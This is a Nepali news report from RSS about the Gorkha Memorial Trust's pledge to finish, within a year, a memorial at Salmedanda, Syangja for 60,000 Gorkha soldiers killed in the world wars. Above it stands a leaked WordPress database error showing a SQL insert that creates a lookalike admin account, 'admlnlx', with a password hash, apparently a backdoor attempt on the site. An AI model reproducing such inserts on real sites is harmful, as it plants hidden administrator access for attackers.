WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B40oD2Vhk1Gia9.4.Wz/X9D0.v7nux0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 13:48:38', '', 'admlnlx', 'admlnlx')
पोखरा,माघ २४-
गोरखा स्मारक ट्रष्टका अध्यक्ष पदमबहादुर गुरुङले स्याङजाको साल्मेडाँडामा निर्माणाधीन गोरखा समाधि एक वर्षभित्रमा सम्पन्न गरिने बताउनुभएको छ ।
विश्व युद्धमा ज्यान गुमाएका ६० हजार गोरखा सैनिकको स्मृतिमा निर्माणाधीन स्मारकको निर्माण एवम् पछिल्ला गतिविधिबारे जानकारी दिन आज यहाँ आयोजित पत्रकार भेटघाट कार्यक्रममा उहाँले प्रथम चरणअन्तर्गतको समाधि निर्माण कार्य एक वर्षभित्रमा सम्पन्न गर्ने लक्ष्यका साथ काम बढिरहेको बताउनुभयो ।
विश्व युद्धमा बलिदानी गरेका भूतपूर्व गोरखा सैनिकका हक तथा अधिकारका लागि सुरु गरिएको गोरखा भूतपूर्व सैनिक सङ्घ (गेसा)कोे आन्दोलनको उपलब्धिस्वरुप गोरखामाथि भएको विभेद् र अन्यायका विरुद्धमा बेलायतमा नै मुद्दा दायर गरी युद्धबन्दीको मुद्दा जितिएको उहाँले जानकारी दिनुभयो ।
उहाँका अनुसार भूतपूर्व गोरखा सैनिकको योगदानलाई जीवन्त राख्नका लागि गोरखा स्मारकको निर्माणकार्य अघि बढाइएको हो । अन्यायमा पारिएका गोरखा सैनिकका अधिकार दिलाउन क्रियाशील ‘गेसो’ आन्दोलनलाई अबमूल्यन गरी कमजोर बनाउने षड्यन्त्र भइरहेको बताउनुभयो ।
गोरखा स्मारक ट्रष्ट निर्माण समितिका संयोजक पुरनध्वज गुरुङले विगत २७ वर्षयता गोरखा भूतपूर्व सैनिकको हक तथा अधिकारका लागि सञ्चालित गेसो आन्दोलन वर्तमानसम्म आइपुगेको बताउँदै गोरखा भूतपूर्व सैनिकको योगदानलाई बचाउनका लागि निर्माणाधीन समाधिस्थल एक वर्षभित्रमा नै सम्पन्न गरिने स्पष्ट पार्नुभयो ।- रासस